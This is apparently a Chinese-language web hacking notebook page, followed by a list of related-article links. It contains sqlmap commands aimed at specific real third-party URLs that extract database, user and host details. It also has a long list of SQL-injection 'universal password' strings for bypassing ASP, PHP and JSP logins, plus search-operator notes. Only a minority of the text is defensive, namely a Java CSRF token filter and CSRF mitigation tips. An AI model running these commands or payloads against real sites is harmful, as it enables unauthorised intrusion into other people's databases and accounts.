web hacker筆記
sqlmap.py -u "http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911" --threads 10 --level 3 -p myparams --dbms "MySQL" --current-db --current-user --hostname
sqlmap -u "http://www.1think.com.cn/Search.php?SearchKeyWords=HAHA" --threads 15 --level 3 --dbms "Microsoft SQL Server" --os "Windows" --current-db --current-user --hostname
BSoD,Blue Screen of Death,即藍屏當機。
微軟作業系統的經典當機提示螢幕。通常是由於工作在Ring0
級的核心程式出錯導致的,比如核心程式訪問了不可訪問的記憶體會立即導致BSoD。
Proof of Conc Proof of Conceptept
簡稱PoC,
中文翻譯為概念證明,是證實發布的漏洞真實性的測試程式碼,一般可以理解為和漏洞利用工具差不多的意思。
在 filter
中驗證請求中的 token
HttpServletRequest req = (HttpServletRequest)request;
HttpSession s = req.getSession();
// 從 session 中得到 csrftoken 屬性
String sToken = (String)s.getAttribute(“csrftoken”);
if(sToken == null){
// 產生新的 token 放入 session 中
sToken = generateToken();
s.setAttribute(“csrftoken”,sToken);
chain.doFilter(request, response);
} else{
// 從 HTTP 頭中取得 csrftoken
String xhrToken = req.getHeader(“csrftoken”);
// 從請求引數中取得 csrftoken
String pToken = req.getParameter(“csrftoken”);
if(sToken != null && xhrToken != null && sToken.equals(xhrToken)){
chain.doFilter(request, response);
}else if(sToken != null && pToken != null && sToken.equals(pToken)){
chain.doFilter(request, response);
}else{
request.getRequestDispatcher(“error.jsp”).forward(request,response);
}
}
跨站請求偽造CSRF漏洞防禦
CSRF
漏洞防禦主要可以從三個層面進行,即服務端的防禦、使用者端的防禦和安全裝置的防禦。
1、 服務端的防禦
1.1 驗證HTTP Referer
欄位
1.2 在請求地址中新增token
並驗證
1.3 在HTTP
頭中自定義屬性並驗證
2、其他防禦方法
CSRF
攻擊是有條件的,當使用者訪問惡意連結時,認證的cookie
仍然有效,所以當使用者關閉頁面時要及時清除認證cookie
,對支援TAB
模式(新標籤開啟網頁)的瀏覽器尤為重要。- 儘量少用或不要用
request()
類變數,獲取引數指定request.form()
還是request. querystring ()
,這樣有利於阻止CSRF
漏洞攻擊,此方法只不能完全防禦CSRF
攻擊,只是一定程度上增加了攻擊的難度。
asp aspx
萬能密碼
1: "or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6: "or 1=1--
7:'or'a'='a
8: "or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 新型萬能登陸密碼
使用者名稱 `' UNION Select 1,1,1 FROM admin Where ''=' (替換表名admin)`
密碼 1
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
17.`admin' or 'a'='a` 密碼隨便
PHP萬能密碼
'or'='or'
'or 1=1/* 字元型 GPC是否開都可以使用
User: something
Pass: ' OR '1'='1
jsp 萬能密碼
1' or '1'='1
admin' OR 1=1/*
使用者名稱:admin 系統存在這個使用者的時候 才用得上
密碼:1' or '1'='1
搜尋命令
- intitle: 限制搜尋的詞語是網頁標題中包含的關鍵詞
intitle:keyword
- inurl: 限制搜尋的網頁的地址
inurl:keyword
- filetype: 限制所搜尋的檔案一個特定的格式
filetype:extension
- site: 限制所進行的搜尋在指定的域名或網站內
site:domain
- intext: 限制搜尋的詞語是網頁內文包含的關鍵詞
intext:keyword
相關文章
- Tea,為 hacker 而生的筆記應用筆記
- web 考試筆記Web筆記
- 【Web】Web 階段學習筆記Web筆記
- Web 效能優化筆記Web優化筆記
- 筆記:API 和 Web API筆記APIWeb
- Web 靶場筆記-bWAPPWeb筆記APP
- Web Bundles 學習筆記Web筆記
- Web之http學習筆記WebHTTP筆記
- Web基礎學習筆記Web筆記
- “初雪”與“向量化”| StarRocks Hacker Meetup小記
- hash hacker
- 讀《白帽子講web安全》 ——筆記Web筆記
- JAVA學習筆記—JAVA WEB(二)JAVA WEB核心(下)Java筆記Web
- 《白帽子講web安全》讀書筆記Web筆記
- Web命令執行筆記(持續更新)Web筆記
- SpringBoot文件之Web的閱讀筆記Spring BootWeb筆記
- Web開發學習筆記——HTTP 概述Web筆記HTTP
- 狂神說Java Web學習筆記_CookieJavaWeb筆記Cookie
- 狂神說Java Web學習筆記_TomcatJavaWeb筆記Tomcat
- 飛機的 PHP 學習筆記七:WebPHP筆記Web
- Web類別(小迪網路安全筆記~Web筆記
- go實戰web入門學習筆記GoWeb筆記
- web前端培訓分享node學習筆記Web前端筆記
- 學習筆記--Web基礎day04筆記Web
- Hacker必備技能
- 好程式設計師web前端培訓學習筆記Vue學習筆記一程式設計師Web前端筆記Vue
- [CTF/Web] PHP 反序列化學習筆記WebPHP筆記
- 飛機的 PHP 學習筆記之 Web 篇PHP筆記Web
- Web額外配置(小迪網路安全筆記~Web筆記
- Web 開發學習筆記(1) — 搭建你的第一個 Web ServerWeb筆記Server
- [Hacker News 週報] #583
- 好程式設計師web前端培訓學習筆記Vue學習筆記之二程式設計師Web前端筆記Vue
- PHP 轉 Node 筆記(二. 基礎的Web開發)PHP筆記Web
- Web 開發學習筆記(4) — 重定向與HSTSWeb筆記
- HTTP讀書筆記——瞭解Web及網路基礎HTTP筆記Web
- Web 開發學習筆記(5) — 抽象出 Page 類Web筆記抽象
- 《圖解http》閱讀筆記--web及網路基礎圖解HTTP筆記Web
- Web安全學習筆記之更新kali國內源Web筆記